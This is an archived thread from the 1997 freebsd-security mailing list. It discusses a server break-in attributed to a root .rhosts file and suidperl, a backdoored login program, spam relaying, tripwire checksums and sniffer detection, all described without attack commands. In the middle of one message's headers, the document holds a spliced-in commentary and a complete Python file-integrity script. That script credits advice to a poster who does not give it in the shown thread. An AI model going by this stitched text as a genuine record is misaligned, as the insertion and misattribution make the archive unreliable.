MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Mon, 28 Jul 1997, Vincent Poy wrote:
> On Mon, 28 Jul 1997, Jonathan A. Zdziarski wrote:
>
> =)Hrm if you always use kill -9 try the reverse, just a kill or a kill -15
>
> I did that too. even kill -HUP only kills the master process. I
> had to kill the child process manually.

That's what the killall script is for :-)

Since I've finally plowed through the dozens (hundreds? ;-) of messages on the subject...

None of my FreeBSD systems have ever installed a /root/.rhosts file to my knowledge, unless it's been a zero length file. I'd have to grok the scripts, but I know for a fact that a FreeBSD install wouldn't know to create a /root/.rhosts that had the name of your other machine in it. Some one of your admins did that luser trick (e.g. to enable rsh/rcp).

Second, my interpretation of the init man page suggests that securelevel 1 would PREVENT me from writing to mounted disks at the time the securelevel 1 is "invoked". So, for instance, if I used sysctl to change kern.securelevel from 0 to 1 *right now*, my server processes (httpd, sendmail, etc.) would suddenly blow up because they couldn't write to the disks. Thus, the only time one would want to invoke securelevel 1 would be from /etc/rc before the disks are mounted. Correct???

(The rest is dribble mostly directed to Vince, but possibly useful to others).

Third, Vince stated something to the effect that Jordan Hubbard couldn't hold a candle to this hacker ("wasn't in the same league") and then posted IRC dribble. I'd bet this hacker couldn't hold a candle to Jordan and probably is just a luser with a copy of rootkit.
(Just had to get that one off my mind ;)

Fourth, you might as well take that machine off the net (turn it off) if you can't get physical access to it for 2-4 months. It's gone gone gone! If you've been telnetting to it forever with no encryption, tcpwrappers, or router filters, your hacker could have been on your system for weeks or months before acting up and you wouldn't have a clue.. A few years ago when I was a weenie (ok, I still am compared to Jordan and Nate and... ;-) I challenged (deliberately) some of my more clueful customers to hack me...one of them was root on my system for almost a month before I noticed suspicious activity.

Your descriptions of comparing files between machines (e.g. comparing byte sizes/dates of telnetd) suggest that you never ran anything like tripwire/cops to compute checksums of the files. Thus, you'd have NO clue which files really might have been changed. And if you DID run Tripwire before the hacker, and ran it again after the hacker, but didn't compare the result to a known clean OFFLINE copy of the tripwire database (e.g. a paper/floppy copy)...forget it! :)

--
John-David Childs (JC612) @denver.net/Internet-Coach/@ronan.net
System Administrator Enterprise Internet Solutions & Network Engineer
901 E 17th Ave, Denver 80218
All programmers are playwrights and all computers are lousy actors.

From owner-freebsd-security Mon Jul 28 22:35:46 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id WAA11074 for security-outgoing; Mon, 28 Jul 1997 22:35:46 -0700 (PDT)
Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id WAA11067; Mon, 28 Jul 1997 22:35:40 -0700 (PDT)
Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id WAA08469; Mon, 28 Jul 1997 22:35:36 -0700 (PDT)
Date: Mon, 28 Jul 1997 22:35:36 -0700 (PDT)
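Jordan's mtree/tripwire advice and the checksum-versus-size/date point just above can be shown concretely. The Python below is an added example, not the thread's or FreeBSD's code; it builds a hash manifest meant to be kept on offline media and, on a constructed two-file tree, shows a same-size, timestamp-restored replacement that a size/date comparison misses and a hash comparison catches.

```python
"""File-integrity baseline in the spirit of mtree/tripwire. Added example.

build_manifest() records a SHA-256 hash, size, mode and mtime per file;
dump_manifest() produces the text to store offline; compare() diffs a
current manifest against that baseline. trojan_demo() is a constructed
scenario, not a real incident.
"""
import hashlib
import os
import tempfile


def file_sha256(path):
    """Stream the file through SHA-256 so large binaries need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(root):
    """Map relative path -> (sha256, size, mode, mtime) for every regular file under root."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full):
                continue  # a real tool records symlink targets in a separate pass
            st = os.stat(full)
            rel = os.path.relpath(full, root)
            manifest[rel] = (file_sha256(full), st.st_size, st.st_mode & 0o7777, int(st.st_mtime))
    return manifest


def dump_manifest(manifest):
    """One sortable line per file; write this to read-only/offline media (or print it)."""
    lines = [f"{h} {size} {mode:04o} {mtime} {path}"
             for path, (h, size, mode, mtime) in sorted(manifest.items())]
    return "\n".join(lines) + "\n"


def load_manifest(text):
    """Inverse of dump_manifest(); the path is last so it may contain spaces."""
    manifest = {}
    for line in text.splitlines():
        if line.strip():
            h, size, mode, mtime, path = line.split(" ", 4)
            manifest[path] = (h, int(size), int(mode, 8), int(mtime))
    return manifest


def compare(baseline, current, by_hash=True):
    """Diff two manifests. by_hash=False reproduces a size/mode/date-only comparison."""
    def key(entry):
        return entry if by_hash else entry[1:]   # drop the hash -> (size, mode, mtime)
    both = set(baseline) & set(current)
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "changed": sorted(p for p in both if key(baseline[p]) != key(current[p])),
    }


def trojan_demo():
    """Constructed scenario: baseline a tiny bin/ tree, then replace one file with
    same-length contents and put its timestamp back, as a rootkit install would."""
    with tempfile.TemporaryDirectory() as root:
        bindir = os.path.join(root, "bin")
        os.mkdir(bindir)
        files = {"sh": b"original-sh-image\n", "telnetd": b"original-telnetd\n"}
        for name, body in files.items():
            with open(os.path.join(bindir, name), "wb") as fh:
                fh.write(body)
        # Round-trip through the text format, as if read back from offline media.
        baseline = load_manifest(dump_manifest(build_manifest(root)))
        victim = os.path.join(bindir, "telnetd")
        before = os.stat(victim)
        with open(victim, "wb") as fh:
            fh.write(b"TROJANED-telnetd\n")       # same length as the original
        os.utime(victim, ns=(before.st_atime_ns, before.st_mtime_ns))
        current = build_manifest(root)
        return {"size_date_only": compare(baseline, current, by_hash=False),
                "hashed": compare(baseline, current)}


if __name__ == "__main__":
    for method, diff in trojan_demo().items():
        print(f"{method:15s} changed={diff['changed']}")
```

The baseline only proves anything if it was taken before the compromise and stored where the intruder could not rewrite it; a manifest left on the hacked disk is no better than the dates it records.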
From: Vincent Poy
To: Gary Palmer
cc: Nate Williams , "Jonathan A. Zdziarski" , security@FreeBSD.ORG, JbHunt , "[Mario1-]"
Subject: Re: security hole in FreeBSD
In-Reply-To: <29452.870154093@orion.webspan.net>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Tue, 29 Jul 1997, Gary Palmer wrote:
=)Vincent Poy wrote in message ID
=):
=)> Nothing is unhackable. and the hacker did say it was the .rhosts
=)> file along with perl5.00401 that did it. Nothing is foolproof.
=)
=)As evidenced by the fact you believe him. Questions that remain
=)unanswered:
=)
=)1) if he did use an .rhosts, how did the file get there?

That's what I'm trying to figure out. I know I never had a .rhosts file in my directory because I still have a tarball of my directory.

=)2) I didn't know there was a setuid bug in perl 5.00401. What did he
=) do to exploit perl?

I don't know because all I know was he got an account on mercury.GAIANET.NET and complained perl5 wasn't working because the libmalloc file was missing. This was because the /usr/local/bin was a backup from another machine that had FreeBSD since 2.1R and we did this drive from scratch so it was perl5.003. So I did a cvsup and installed perl5.00401 and that's when all the problems began. 5.003 is the one with security holes which we know about.

=)3) Did you really talk to him on irc, or just some lamer pretending to
=) have done the hack?

I wasn't the one who talked to him but I know it's him because his ip address on irc will reach his Linux machine which he calls soma and that was the same guy who asked me about the perl thing.

=)and most importantly:
=)
=)4) did you LEARN from this experience? If not, *WHY* not?

Of course... never trust anyone on the system. Too bad there wasn't a way to watch everyone or log their commands.
Cheers,
Vince - vince@MCESTATE.COM - vince@GAIANET.NET

From owner-freebsd-security Mon Jul 28 22:37:49 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id WAA11219 for security-outgoing; Mon, 28 Jul 1997 22:37:49 -0700 (PDT)
Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id WAA11210; Mon, 28 Jul 1997 22:37:44 -0700 (PDT)
Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id WAA08486; Mon, 28 Jul 1997 22:37:40 -0700 (PDT)
Date: Mon, 28 Jul 1997 22:37:39 -0700 (PDT)
From: Vincent Poy
To: Gary Palmer
cc: John Dowdal , security@FreeBSD.ORG, JbHunt , "[Mario1-]"
Subject: Re: security hole in FreeBSD
In-Reply-To: <29485.870154154@orion.webspan.net>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Tue, 29 Jul 1997, Gary Palmer wrote:
=)Vincent Poy wrote in message ID
=):
=)> I'll try but some of these ISPs take like 3 weeks to respond even
=)> if you mention legal action. They don't think you can do anything to them
=)> because they are out of state.
=)
=)Don't mention legal action until the first round of complaints are not
=)dealt with then ... simple.

I've done that before too... If I don't mention legal action, they will never respond. I guess they just think it's not their system so they could care less.

Cheers,
Vince - vince@MCESTATE.COM - vince@GAIANET.NET

From owner-freebsd-security Mon Jul 28 22:40:37 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id WAA11445 for security-outgoing; Mon, 28 Jul 1997 22:40:37 -0700 (PDT)
Received: from mail.webspan.net (root@mail.webspan.net [206.154.70.7]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id WAA11437 for ; Mon, 28 Jul 1997 22:40:35 -0700 (PDT)
Received: from orion.webspan.net (orion.webspan.net [206.154.70.5]) by mail.webspan.net (WEBSPAN/970608) with ESMTP id BAA22932; Tue, 29 Jul 1997 01:40:31 -0400 (EDT)
Received: from orion.webspan.net (localhost [127.0.0.1]) by orion.webspan.net (WEBSPAN/970608) with ESMTP id BAA02484; Tue, 29 Jul 1997 01:40:31 -0400 (EDT)
To: Vincent Poy
cc: John Dowdal , security@FreeBSD.ORG, JbHunt , "[Mario1-]"
From: "Gary Palmer"
Subject: Re: security hole in FreeBSD
In-reply-to: Your message of "Mon, 28 Jul 1997 22:37:39 PDT."
Date: Tue, 29 Jul 1997 01:40:31 -0400
Message-ID: <2482.870154831@orion.webspan.net>
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

Vincent Poy wrote in message ID :
> I've done that before too... If I don't mention legal action,
> they will never respond. I guess they just think it's not their system so
> they could care less.

Don't think that about Erols until you try ... I know the person who answers the abuse mail. I think he'd be offended by that statement.

Gary
--
Gary Palmer FreeBSD Core Team Member
FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info

From owner-freebsd-security Mon Jul 28 22:44:35 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id WAA11954 for security-outgoing; Mon, 28 Jul 1997 22:44:35 -0700 (PDT)
Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id WAA11946; Mon, 28 Jul 1997 22:44:30 -0700 (PDT)
Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id WAA08523; Mon, 28 Jul 1997 22:44:24 -0700 (PDT)
Date: Mon, 28 Jul 1997 22:44:23 -0700 (PDT)
From: Vincent Poy
To: Gary Palmer
cc: John Dowdal , security@FreeBSD.ORG, JbHunt , "[Mario1-]"
Subject: Re: security hole in FreeBSD
In-Reply-To: <2482.870154831@orion.webspan.net>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Tue, 29 Jul 1997, Gary Palmer wrote:
=)Vincent Poy wrote in message ID
=):
=)> I've done that before too... If I don't mention legal action,
=)> they will never respond. I guess they just think it's not their system so
=)> they could care less.
=)
=)Don't think that about Erols until you try ... I know the person who
=)answers the abuse mail. I think he'd be offended by that statement.

I wasn't talking about erols but with some isp's for things such as relaying spam mail.

Cheers,
Vince - vince@MCESTATE.COM - vince@GAIANET.NET

From owner-freebsd-security Mon Jul 28 22:51:06 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id WAA12445 for security-outgoing; Mon, 28 Jul 1997 22:51:06 -0700 (PDT)
Received: from mail.webspan.net (root@mail.webspan.net [206.154.70.7]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id WAA12440 for ; Mon, 28 Jul 1997 22:51:03 -0700 (PDT)
Received: from orion.webspan.net (orion.webspan.net [206.154.70.5]) by mail.webspan.net (WEBSPAN/970608) with ESMTP id BAA24219; Tue, 29 Jul 1997 01:50:59 -0400 (EDT)
Received: from orion.webspan.net (localhost [127.0.0.1]) by orion.webspan.net (WEBSPAN/970608) with ESMTP id BAA05362; Tue, 29 Jul 1997 01:50:59 -0400 (EDT)
To: Vincent Poy
cc: John Dowdal , security@FreeBSD.ORG, JbHunt , "[Mario1-]"
From: "Gary Palmer"
Subject: Re: security hole in FreeBSD
In-reply-to: Your message of "Mon, 28 Jul 1997 22:44:23 PDT."
Date: Tue, 29 Jul 1997 01:50:59 -0400
Message-ID: <5360.870155459@orion.webspan.net>
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

Vincent Poy wrote in message ID :
> I wasn't talking about erols but with some isp's for things such
> as relaying spam mail.

You can take legal action against people whose machines were exploited to relay spam mail? Wow!

I think perhaps you have to understand that if they were used as a relay for spam mail, they are going to get *FLOODED* with mail (I know from experience). There's not a thing you can do (well, I stayed up all night once and fitted anti-relay rules to sendmail, but in the past they weren't available). Most people will just delete or refile the complaints, since they can't really do anything about the user who originated them. Complaining to relays rarely does any good. Either they can't be bothered to fix it, or don't know how. That's when cisco access list rules to block their mail hosts come in handy.

Gary
--
Gary Palmer FreeBSD Core Team Member
FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info

From owner-freebsd-security Mon Jul 28 22:56:07 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id WAA12930 for security-outgoing; Mon, 28 Jul 1997 22:56:07 -0700 (PDT)
Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id WAA12882; Mon, 28 Jul 1997 22:56:00 -0700 (PDT)
Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id WAA08587; Mon, 28 Jul 1997 22:55:56 -0700 (PDT)
Date: Mon, 28 Jul 1997 22:55:55 -0700 (PDT)
From: Vincent Poy
To: Gary Palmer
cc: John Dowdal , security@FreeBSD.ORG, JbHunt , "[Mario1-]"
Subject: Re: security hole in FreeBSD
In-Reply-To: <5360.870155459@orion.webspan.net>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Tue, 29 Jul 1997, Gary Palmer wrote:
=)Vincent Poy wrote in message ID
=):
=)> I wasn't talking about erols but with some isp's for things such
=)> as relaying spam mail.
=)
=)You can take legal action against people whose machines were exploited
=)to relay spam mail? Wow!

No not really but I was talking about people who were using aol.com accounts and psi.net accounts to send mail using us as a relay and then it uses the other machines as a relay too but all the mails will bounce to the postmaster address on our machine.

=)I think perhaps you have to understand that if they were used as a
=)relay for spam mail, they are going to get *FLOODED* with mail (I know
=)from experience). There's not a thing you can do (well, I stayed up all
=)night once and fitted anti-relay rules to sendmail, but in the past
=)they weren't available). Most people will just delete or refile the
=)complaints, since they can't really do anything about the user who
=)originated them. Complaining to relays rarely does any good. Either
=)they can't be bothered to fix it, or don't know how. That's when cisco
=)access list rules to block their mail hosts come in handy.

I know what you mean here. We tried sendmail anti-relay rules. While it worked, there were more problems generated than it fixed. All I know is some companies use something other than sendmail they custom designed and had a way to kill the process but for icmp floods, the ISP would be responsible since it's a DoS attack.
Cheers,
Vince - vince@MCESTATE.COM - vince@GAIANET.NET

From owner-freebsd-security Mon Jul 28 23:00:03 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id XAA13190 for security-outgoing; Mon, 28 Jul 1997 23:00:03 -0700 (PDT)
Received: from time.cdrom.com (root@time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id WAA13139 for ; Mon, 28 Jul 1997 22:59:59 -0700 (PDT)
Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.6/8.6.9) with ESMTP id WAA06898; Mon, 28 Jul 1997 22:59:31 -0700 (PDT)
To: Vincent Poy
cc: "Jonathan A. Zdziarski" , "[Mario1-]" , JbHunt , Robert Watson , Tomasz Dudziak , security@FreeBSD.ORG
Subject: Re: security hole in FreeBSD
In-reply-to: Your message of "Mon, 28 Jul 1997 17:27:15 PDT."
Date: Mon, 28 Jul 1997 22:59:31 -0700
Message-ID: <6894.870155971@time.cdrom.com>
From: "Jordan K. Hubbard"
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

> Just a update on how the break-in was done after the hacker was
> confronted on irc.
>
> Apparently FreeBSD ships with .rhosts in the root account. Using

No, FreeBSD does not ship with .rhosts in the root account. This must have been a local change. If you do not believe this then simply do a fresh installation of FreeBSD and see for yourself - sorry, you shot your own feet off here. :-)

Jordan

From owner-freebsd-security Mon Jul 28 23:02:55 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id XAA13468 for security-outgoing; Mon, 28 Jul 1997 23:02:55 -0700 (PDT)
Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id XAA13463 for ; Mon, 28 Jul 1997 23:02:53 -0700 (PDT)
Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id XAA08630; Mon, 28 Jul 1997 23:02:15 -0700 (PDT)
Date: Mon, 28 Jul 1997 23:02:15 -0700 (PDT)
From: Vincent Poy
To: "Jordan K. Hubbard"
cc: "Jonathan A. Zdziarski" , "[Mario1-]" , JbHunt , Robert Watson , Tomasz Dudziak , security@FreeBSD.ORG
Subject: Re: security hole in FreeBSD
In-Reply-To: <6894.870155971@time.cdrom.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Mon, 28 Jul 1997, Jordan K. Hubbard wrote:
=)> Just a update on how the break-in was done after the hacker was
=)> confronted on irc.
=)>
=)> Apparently FreeBSD ships with .rhosts in the root account. Using
=)
=)No, FreeBSD does not ship with .rhosts in the root account. This must
=)have been a local change. If you do not believe this then simply do a
=)fresh installation of FreeBSD and see for yourself - sorry, you shot
=)your own feet off here. :-)

I just verified it and you're right. It doesn't but what about the adduser program? I have a tarball of my home directory and there is no .rhosts there either. I wonder how the .rhosts got there in the first place.
Cheers,
Vince - vince@MCESTATE.COM - vince@GAIANET.NET

From owner-freebsd-security Mon Jul 28 23:08:05 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id XAA13795 for security-outgoing; Mon, 28 Jul 1997 23:08:05 -0700 (PDT)
Received: from time.cdrom.com (root@time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id XAA13779 for ; Mon, 28 Jul 1997 23:08:02 -0700 (PDT)
Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.6/8.6.9) with ESMTP id XAA06942; Mon, 28 Jul 1997 23:07:58 -0700 (PDT)
To: Annelise Anderson
cc: John Preisler , security@FreeBSD.ORG
Subject: Re: security hole in FreeBSD
In-reply-to: Your message of "Mon, 28 Jul 1997 20:41:32 PDT."
Date: Mon, 28 Jul 1997 23:07:58 -0700
Message-ID: <6938.870156478@time.cdrom.com>
From: "Jordan K. Hubbard"
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

As I've already pointed out, Vince is sadly confused here. It would hardly be the first time. :-)

> On Mon, 28 Jul 1997, John Preisler wrote:
>
> > I'm not convinced that FreeBSD installs a /root/.rhosts by default.
> > None of my boxes have it.
> >
> > -jrp
>
> Neither do mine.
>
> Annelise
>

From owner-freebsd-security Mon Jul 28 23:11:35 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id XAA14111 for security-outgoing; Mon, 28 Jul 1997 23:11:35 -0700 (PDT)
Received: from time.cdrom.com (root@time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id XAA14106 for ; Mon, 28 Jul 1997 23:11:32 -0700 (PDT)
Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.6/8.6.9) with ESMTP id XAA06986; Mon, 28 Jul 1997 23:11:24 -0700 (PDT)
To: Nate Williams
cc: Vincent Poy , "Jonathan A. Zdziarski" , security@FreeBSD.ORG
Subject: Re: security hole in FreeBSD
In-reply-to: Your message of "Mon, 28 Jul 1997 22:09:50 MDT." <199707290409.WAA10250@rocky.mt.sri.com>
Date: Mon, 28 Jul 1997 23:11:24 -0700
Message-ID: <6982.870156684@time.cdrom.com>
From: "Jordan K. Hubbard"
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

> Apparently you've yet to find a clue. Go rub yourself with clue juice,
> and dance the clue dance, and maybe you'll get one.

Is this based on the famous "you couldn't get a clue if you smeared yourself in clue-musk and danced naked in a field full of horny clues during clue mating season" quote? ;-)

Jordan

From owner-freebsd-security Mon Jul 28 23:13:20 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id XAA14272 for security-outgoing; Mon, 28 Jul 1997 23:13:20 -0700 (PDT)
Received: from ravian.globalxs.nl (root@ravian.GlobalXS.nl [143.178.250.5]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id XAA14265 for ; Mon, 28 Jul 1997 23:13:17 -0700 (PDT)
Received: from cremers.globalxs.nl (ztm04-06.dial.xs4all.nl [194.109.32.103]) by ravian.globalxs.nl (8.7.4/8.7.3) with SMTP id IAA04608 for ; Tue, 29 Jul 1997 08:13:13 +0200
Message-Id: <199707290613.IAA04608@ravian.globalxs.nl>
Comments: Authenticated sender is
From: "Museum Security Mailinglist"
To: security@FreeBSD.ORG
Date: Tue, 29 Jul 1997 08:15:10 +0000
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Subject: Re: security-digest V3 #60
Reply-to: securma@xs4all.nl
Priority: normal
In-reply-to: <199707282118.OAA03650@hub.freebsd.org>
X-mailer: Pegasus Mail for Win32 (v2.53/R1)
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

unsubscribe securma@xs4all.nl

thanks,

----
The Museum Security Network
dedicated to protection of cultural property
http://museum-security.org/
http://www.xs4all.nl/~securma/
subscribe@museum-security.org
unsubscribe@museum-security.org/
----

From owner-freebsd-security Mon Jul 28 23:17:07 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id XAA14469 for security-outgoing; Mon, 28 Jul 1997 23:17:07 -0700 (PDT)
Received: from time.cdrom.com (root@time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id XAA14464 for ; Mon, 28 Jul 1997 23:17:05 -0700 (PDT)
Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.6/8.6.9) with ESMTP id XAA07009; Mon, 28 Jul 1997 23:17:05 -0700 (PDT)
To: Vincent Poy
cc: security@FreeBSD.ORG, "[Mario1-]" , JbHunt
Subject: Re: security hole in FreeBSD
In-reply-to: Your message of "Mon, 28 Jul 1997 22:15:02 PDT."
Date: Mon, 28 Jul 1997 23:17:05 -0700
Message-ID: <7005.870157025@time.cdrom.com>
From: "Jordan K. Hubbard"
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

> I'm planning to reinstall all the binaries anyways but it's kind of hard
> when I'm in Northern California and the owners are out of the country for
> 2-4 months leaving the machines in the closet totally unattended. I know

Wonderful. That sounds like a freakin' nightmare. :(

Jordan

From owner-freebsd-security Tue Jul 29 00:14:58 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id AAA19228 for security-outgoing; Tue, 29 Jul 1997 00:14:58 -0700 (PDT)
Received: from ns.cs.msu.su (laskavy@redsun.cs.msu.su [158.250.10.2]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id AAA19217 for ; Tue, 29 Jul 1997 00:14:50 -0700 (PDT)
Received: (from laskavy@localhost) by ns.cs.msu.su (8.8.6/8.6.12) id LAA04724; Tue, 29 Jul 1997 11:13:24 +0400 (DST)
Date: Tue, 29 Jul 1997 11:13:24 +0400 (DST)
Message-Id: <199707290713.LAA04724@ns.cs.msu.su>
From: "Sergei S. Laskavy" To: langfod@dihelix.com CC: vince@mail.MCESTATE.COM, security@FreeBSD.ORG, mario1@PrimeNet.Com, johnnyu@accessus.net In-reply-to: <199707281830.IAA15209@caliban.dihelix.com> (langfod@dihelix.com) Subject: Re: security hole in FreeBSD Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk

>>>>> "David" == David Langford writes:

David> I recently caught a breakin fairly similar. The perp [...]
David> replaced /bin/login with one that would let them login to
David> ANY account with a password of "lemmein". The login would
David> NOT be logged and so it was very difficult to tell what was
David> going on.

David> My only guess is that they used the old suidperl hack to
David> get root. Supposedly this doesn't work on newer perl
David> though.

Please, add a note about insecure sperl4.036 and sperl5.003 somewhere in ERRATA.TXT or in SECURITY.TXT or even in README.TXT and maybe in some other appropriate places. People are still just downloading the "bin" distribution and then hackers are able to gain root easily.

David> My suggestion to you would be to get a clean source tree,
David> recompile everything and install tripwire.

David> -David Langford langfod@dihelix.com

From owner-freebsd-security Tue Jul 29 01:12:25 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id BAA23050 for security-outgoing; Tue, 29 Jul 1997 01:12:25 -0700 (PDT) Received: from ns.okbmei.msk.su (gw2.okbmei.msk.su [194.190.170.19]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id BAA23045; Tue, 29 Jul 1997 01:12:18 -0700 (PDT) Received: (from davydov@localhost) by ns.okbmei.msk.su (8.8.6/8.8.6) id MAA21150; Tue, 29 Jul 1997 12:11:58 +0400 (MSD) Message-Id: <199707290811.MAA21150@ns.okbmei.msk.su> Subject: UNSUBSCRIBE In-Reply-To: <7005.870157025@time.cdrom.com> from "Jordan K. Hubbard" at "Jul 28, 97 11:17:05 pm" To: jkh@time.cdrom.com (Jordan K.
Hubbard) Date: Tue, 29 Jul 1997 12:11:58 +0400 (MSD) Cc: majordomo@freebsd.org, freebsd-security@freebsd.org From: "Andrew L. Davydov" Reply-To: "Andrew L. Davydov" Organization: OKB MEI X-Mailer: ELM [version 2.4ME+ PL31H (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk unsubscribe freebsd-security davydov@ns.okbmei.msk.su Please !!!!!!!!!!! --------------------- Mr. Andrew L. Davydov Network Manager - UniForum Member From owner-freebsd-security Tue Jul 29 02:06:07 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id CAA26453 for security-outgoing; Tue, 29 Jul 1997 02:06:07 -0700 (PDT) Received: from milehigh.denver.net (milehigh.denver.net [204.144.180.2]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id CAA26446; Tue, 29 Jul 1997 02:06:00 -0700 (PDT) Received: from localhost (jdc@localhost) by milehigh.denver.net (8.8.5/8.8.5) with SMTP id DAA02716; Tue, 29 Jul 1997 03:09:29 -0600 (MDT) Date: Tue, 29 Jul 1997 03:09:29 -0600 (MDT) 
From: John-David Childs To: Gary Palmer cc: "Nicole H." , security@FreeBSD.ORG Subject: RE: detecting packet sniffers In-Reply-To: <6954.870136449@orion.webspan.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk

On Mon, 28 Jul 1997, Gary Palmer wrote:

> "Nicole H." wrote in message ID
> :
>
> > Does anyone know of a good way to detect people "sniffing" on the
> > network? IE a program that will detect a machine running in
> > promiscuous mode?
>
> There is no way to detect that from outside the machine ... after all,
> it's just listening to all the packets that go past.
>
> FreeBSD 2.2 and later log a message to console when an interface goes
> into promiscuous mode.

I was under the impression from reading various product literature that a trend in the industry is beginning...whereby packet sniffers will periodically send "tokens" on the wire identifying that XYZ PacketSniffer was being used. There was an NT/SunOS commercial security application I saw a few weeks ago which claimed to be able to detect some (not all) other sniffers on the wire...I just can't remember where I saw it. Time to go digging through my archives ;)

-- John-David Childs (JC612) @denver.net/Internet-Coach/@ronan.net System Administrator Enterprise Internet Solutions & Network Engineer 901 E 17th Ave, Denver 80218 "When you have to kill a man it costs nothing to be polite."
